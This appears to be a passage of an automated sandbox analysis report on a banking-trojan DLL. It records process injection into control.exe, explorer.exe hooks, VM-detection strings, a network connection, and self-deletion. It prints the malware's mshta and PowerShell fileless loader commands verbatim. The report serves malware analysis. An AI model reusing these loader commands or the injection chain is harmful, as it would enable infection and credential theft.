                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D8AC0
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D73EC
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007CC46C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007DAC50
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B3C3C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D2428
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007BD404
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B34D8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007DD4D4
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D34C0
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C6CA4
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D0530
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007CCD1C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B9D1C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D7DB4
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C8670
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D1E5C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D1638
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C2EE8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007CBED0
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B1EA8
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D5684
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C6F78
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C4F5C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D772C
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B572C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01354321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0135190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01356D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_013584C1 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C583C NtCreateSection,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B40C0 NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007DA148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007BB11C RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007C41D8 NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007BAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D04CC NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B6D24 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007B9660 NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007EF002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: 628df1368bdb5.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs 628df1368bdb5.dll
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 628df1368bdb5.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 628df1368bdb5.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                      Source: C:\Windows\System32\control.exe | Process created: unknown unknown
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220525
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF019.tmp
                      Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@28/31@0/2
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_013568BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_01
                      Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C052CD84-1FA7-F2C9-A9F4-C346ED68A7DA}
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3412
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.337566379.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 628df1368bdb5.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01357EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0135828B push ecx; ret
                      Source: C:\Windows\System32\control.exe | Code function: 33_2_007D4492 push ss; ret
                      Source: 628df1368bdb5.dll | Static PE information: section name: .erloc
                      Source: 628df1368bdb5.dll | Static PE information: real checksum: 0x79835 should be: 0x7550d
                      Source: vebwfha3.dll.28.dr | Static PE information: real checksum: 0x0 should be: 0x1039a
                      Source: hpvnexdj.dll.31.dr | Static PE information: real checksum: 0x0 should be: 0xe3ae
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara match File source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
                      Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 2896 Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5974
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1268
                      Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: explorer.exe, 00000023.00000000.414345996.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000023.00000000.449700095.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 00000023.00000000.451220379.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000023.00000000.413803782.0000000005137000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx3R
                      Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000023.00000000.449700095.00000000051F7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000023.00000000.452210061.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: mshta.exe, 00000019.00000002.353852606.000001F2003AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: explorer.exe, 00000023.00000000.448654073.0000000005137000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 176.10.119.68 80
                      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
